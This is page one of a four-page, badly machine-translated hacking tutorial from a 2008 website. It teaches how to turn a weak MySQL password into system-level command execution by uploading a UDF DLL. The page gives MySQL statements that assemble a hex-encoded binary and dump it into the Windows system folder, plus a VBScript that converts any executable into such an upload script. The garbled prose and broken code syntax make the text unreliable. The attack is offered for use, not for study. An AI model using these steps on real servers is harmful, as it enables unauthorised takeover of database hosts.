Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
The SQL injection revise
How does the hacker dest
Hacker skill: Gains Webs
MYSQL database injection
The SQL injection revise
Breaks through the Inter
Breaks through the Inter
The hacker teaches you a
Travel of the JSP+Oracle
MYSQL database injection
The new military recruit
mssql SA jurisdiction ne
Union inquires the small
Invades under new skill
The random combined comm
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Teaches you to explain t
Teaches you the hacker t
Teaches you to explain W
Secret path of tracing (
Linux/Rst-B virus still
Barracuda Networks Launc
Is online banking safer
Online criminals exploit
FTP account credentials
Cybercrime is now the do
IT departments worry ove
European Businesses need
The threat of the Ajax S
Harvard University hack
Hacker's script crack to
How teaches you to obtain the system jurisdiction through the Mysql weak password
  Add date: 10/08/2008   Publishing date: 10/08/2008   Hits: 1
Total 4 pages, Current page:1, Jump to page:
 
Very early on-line had obtained the webshell course with the mysql weak password, but this I must say obtain webshell, but obtains the system jurisdiction directly, looked has been clear, was “direct” obtains!

First, I said simply the mysql weak password obtains the system jurisdiction to result in the process: First uploads udf using the mysql script the dll document, then the use registers in UDF DLL from the Function function which writes, but carries out orders willfully.

The mentality is very simple, on-line also has some courses, but they or for the specific code, either a few words generation, have not done look like me to resemble the vegetable very much to be difficult to understand, after I have paid finally several days test the industrious work unceasingly, had a result, I give the detailed process and the related code everybody, like this everybody may write the dll document, oneself produce the different document to result in the binary code!
Below, we said first how to produce the binary file to result in the upload script. Has a look at (method which this section of mysql script code net friend Mix uses):
set @a = concat ('', 0x0123abc1312389 .....);
set @a = concat (@a,0x4658978abc545e ......);
......................

create table Mix (data LONGBLOB); // constructs table Mix, the field is data, the type is longblob
insert into Mix values (""); update Mix set data = @a; //@a insertion table Mix
select data from Mix into DUMPFILE 'C:\ \ Winnt \ \ filename'; // derives in the table the content is a document
First two, this were very familiar we before poured into, bypassed ' the solution, 16 entered the code the system number statement for a variable, then inducted this variable to be good. But here, because 16 enter the system code is a document content, code too steadily, therefore used the concat function to add unceasingly the previous code class, accumulated like this unceasingly to variable a. Following several have been very simple, I have the annotation.

Following three flattery, but front that many 16 enter the system data, the manual words, are exhausting! However you also remembered beforehand has a exe2bat.vbs script? After this we may revises this script, obtains our need to result in the mysql script! Contrasts the exe2bat.vbs production to result in the document and we need the script the document format, we may relaxed the script which obtains us to need. The script content is as follows:
fp=wscript.arguments (0
fn=right (fp, len(fp) - instrrev (fp, “\”))
with createobject (“adodb.stream”)
.type=1: .open: .loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl \ 65536
with createobject (“scripting.filesystemobject”) .opentextfile (fp&” .txt”, 2, true)
.write “set @a = concat ('', 0x”
for i=1 to sl
bt=ascb(midb(str, i,1))
if bt<16 then .write “0”
.write hex(bt)
if i mod 128=0 then .write “); “+vbcrlf+ " set @a = concat (@a,0x”

 
Other pages: : 1 * 2 * 3 * 4 * Next>>
Prev:How teaches you to deal with the DDoS rapids Next:Teaches you to teach the new military recruits to eliminate SQL the server diary the method

Comment:

Category: Home > hacker course
Home